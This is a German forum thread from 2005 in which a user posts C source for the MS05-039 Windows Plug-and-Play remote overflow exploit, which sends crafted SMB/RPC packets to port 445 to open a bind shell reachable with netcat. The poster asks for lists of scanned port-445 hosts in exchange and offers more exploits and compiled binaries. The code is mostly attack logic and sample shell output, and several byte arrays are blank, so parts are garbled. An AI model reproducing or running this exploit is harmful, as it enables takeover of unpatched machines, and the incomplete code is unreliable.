Windows Plug n Play Exploit

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von dakog, 30. November 2005 .

  1. 30. November 2005
    hier ist der Microsoft Plug n Play Exploit für öffnet nach erfolgreichem angriff eine shell auf einem vorher bestimmten bestimmten port zu dem man dann nur noch mit netcat connecten muss
    /* HOD-ms05039-pnp-expl.c: 2005-08-10: PUBLIC v.0.2
    * Copyright (c) 2005 houseofdabus.
    * (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow
    * Universal Exploit + no crash shellcode
    * .::[ houseofdabus ]::.
    * ---------------------------------------------------------------------
    * Description:
    * A remote code execution and local elevation of privilege
    * vulnerability exists in Plug and Play that could allow an
    * attacker who successfully exploited this vulnerability to take
    * complete control of the affected system.
    * This is a remote code execution and local privilege elevation
    * vulnerability. On Windows 2000, an anonymous attacker could
    * remotely try to exploit this vulnerability.
    * On Windows XP Service Pack 1, only an authenticated user could
    * remotely try to exploit this vulnerability.
    * On Window XP Service Pack 2 and Windows Server 2003, only an
    * administrator can remotely access the affected component.
    * Therefore, on Windows XP Service Pack 2 and Windows Server 2003,
    * this is strictly a local privilege elevation vulnerability.
    * An anonymous user cannot remotely attempt to exploit this
    * vulnerability on Windows XP Service Pack 2 and Windows
    * Server 2003.
    * ---------------------------------------------------------------------
    * Solution:
    * ---------------------------------------------------------------------
    * Systems Affected:
    * - Windows Server 2003, SP1
    * - Windows XP SP1, SP2
    * - Windows 2000 SP4
    * ---------------------------------------------------------------------
    * Tested on:
    * - Windows 2000 SP4
    * ---------------------------------------------------------------------
    * Compile:
    * Win32/VC++ : cl -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c
    * Win32/cygwin: gcc -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c
    * Linux : gcc -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c
    * ---------------------------------------------------------------------
    * Example:
    * C:\>HOD-ms05039-pnp-expl 7777
    * [*] connecting to
    * [*] null session...ok
    * [*] bind pipe...ok
    * [*] sending crafted packet...ok
    * [*] check your shell on
    * Ctrl+C
    * C:\>nc 7777
    * Microsoft Windows 2000 [Version 5.00.2195]
    * (C) Copyright 1985-2000 Microsoft Corp.
    * C:\WINNT\system32>
    * ---------------------------------------------------------------------
    * This is provided as proof-of-concept code only for educational
    * purposes and testing by authorized individuals with permission
    * to do so.
    /* #define _WIN32 */
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #ifdef _WIN32
    #include <winsock2.h>
    #pragma comment(lib, "ws2_32")
    #include <sys/types.h>
    #include <netinet/in.h>
    #include <sys/socket.h>
    #include <netdb.h>
    unsigned char SMB_Negotiate[] =
    unsigned char SMB_SessionSetupAndX[] =
    unsigned char SMB_SessionSetupAndX2[] =
    unsigned char SMB_TreeConnectAndX[] =
    unsigned char SMB_TreeConnectAndX_[] =
    /* browser */
    unsigned char SMB_PipeRequest_browser[] =
    unsigned char SMB_PNPEndpoint[] =
    /* 8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0: pnp */
    unsigned char RPC_call[] =
    /* jmp over - entry point */
    /* pop reg; pop reg; retn; - umpnpmgr.dll */
    "\x67\x15\x7a\x76" /* 0x767a1567 */
    /* jmp ebx - umpnpmgr.dll
    "\x6f\x36\x7a\x76" */
    unsigned char RPC_call_end[] =
    unsigned char bind_shellcode[] =
    #define SET_PORTBIND_PORT(buf, port) \
    *(unsigned short *)(((buf)+186)) = (port)
    convert_name(char *out, char *name)
    unsigned long len;
    len = strlen(name);
    out += len * 2 - 1;
    while (len--) {
    *out-- = '\x00';
    *out-- = name[len];
    main (int argc, char **argv)
    struct sockaddr_in addr;
    struct hostent *he;
    int len;
    int sockfd;
    unsigned short smblen;
    unsigned short bindport;
    unsigned char tmp[1024];
    unsigned char packet[4096];
    unsigned char *ptr;
    char recvbuf[4096];
    #ifdef _WIN32
    WSADATA wsa;
    WSAStartup(MAKEWORD(2,0), &wsa);
    printf("\n (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\n");
    printf("\t Universal Exploit + no crash shellcode\n\n\n");
    printf("\t Copyright (c) 2005 .: houseofdabus :.\n\n\n");
    if (argc < 3) {
    printf("%s <host> <bind port>\n", argv[0]);
    if ((he = gethostbyname(argv[1])) == NULL) {
    printf("[-] Unable to resolve %s\n", argv[1]);
    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
    printf("[-] socket failed\n");
    addr.sin_family = AF_INET;
    addr.sin_port = htons(445);
    addr.sin_addr = *((struct in_addr *)he->h_addr);
    memset(&(addr.sin_zero), '\0', 8);
    printf("\n[*] connecting to %s:445...", argv[1]);
    if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {
    printf("\n[-] connect failed\n");
    printf("[*] null session...");
    if (send(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) {
    printf("\n[-] send failed\n");
    len = recv(sockfd, recvbuf, 4096, 0);
    if ((len <= 10) || (recvbuf[9] != 0)) {
    printf("\n[-] failed\n");
    if (send(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) {
    printf("\n[-] send failed\n");
    len = recv(sockfd, recvbuf, 4096, 0);
    if (len <= 10) {
    printf("\n[-] failed\n");
    if (send(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) {
    printf("\n[-] send failed\n");
    len = recv(sockfd, recvbuf, 4096, 0);
    if ((len <= 10) || (recvbuf[9] != 0)) {
    printf("\n[-] failed\n");
    ptr = packet;
    memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
    ptr += sizeof(SMB_TreeConnectAndX)-1;
    sprintf(tmp, "\\\\%s\\IPC$", argv[1]);
    convert_name(ptr, tmp);
    smblen = strlen(tmp)*2;
    ptr += smblen;
    smblen += 9;
    memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);
    memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
    ptr += sizeof(SMB_TreeConnectAndX_)-1;
    smblen = ptr-packet;
    smblen -= 4;
    memcpy(packet+3, &smblen, 1);
    if (send(sockfd, packet, ptr-packet, 0) < 0) {
    printf("\n[-] send failed\n");
    len = recv(sockfd, recvbuf, 4096, 0);
    if ((len <= 10) || (recvbuf[9] != 0)) {
    printf("\n[-] failed\n");
    printf("[*] bind pipe...");
    if (send(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) {
    printf("\n[-] send failed\n");
    len = recv(sockfd, recvbuf, 4096, 0);
    if ((len <= 10) || (recvbuf[9] != 0)) {
    printf("\n[-] failed\n");
    if (send(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) {
    printf("\n[-] send failed\n");
    len = recv(sockfd, recvbuf, 4096, 0);
    if ((len <= 10) || (recvbuf[9] != 0)) {
    printf("\n[-] failed\n");
    printf("[*] sending crafted packet...");
    // nop
    ptr = packet;
    memset(packet, '\x90', sizeof(packet));
    // header & offsets
    memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
    ptr += sizeof(RPC_call)-1;
    // shellcode
    bindport = (unsigned short)atoi(argv[2]);
    bindport ^= 0x0437;
    SET_PORTBIND_PORT(bind_shellcode, htons(bindport));
    memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);
    // end of packet
    memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,
    // sending...
    if (send(sockfd, packet, 2196, 0) < 0) {
    printf("\n[-] send failed\n");
    printf("[*] check your shell on %s:%i\n", argv[1], atoi(argv[2]));
    recv(sockfd, recvbuf, 4096, 0);
    return 0;
    Ach übrigens:Ich fänds echt genial von euch wenn ihr mir als gegenleistung eine scanlist mit port 445 scans geben könntet!
    als gegenleistung werd ich hier weiterhin auch regelmäßig exploitz posten und wenn ich die zusage von den mods bekomme werde ich
    auch die kompilierten versionen der exploitz anhängen.
    gruß dakog
  2. 30. November 2005
    äh..du weißt aber schon das das nur ein DoS-Exploit ist und du damit nur den Controller abschiessen kannst?

    Also nix mit nc auf ne shell connecten.

    //edit: ok code wurde ausgetauscht..
  3. 1. Dezember 2005
    oh.sorry!hab aus versehen nochmal den code vom msdtc-exploit eingefü ist der richtige drin.und somit müsste das connecten mit netcat nun auch funktionieren
    nochmal wegen der kompilierten version:ist es erlaubt eine fertig kompilierte reinzustellen oder wollt ihr das nicht weil sonst zu viele leute dran kommen die keine ahnung haben was das ding macht?
    gruß dakog
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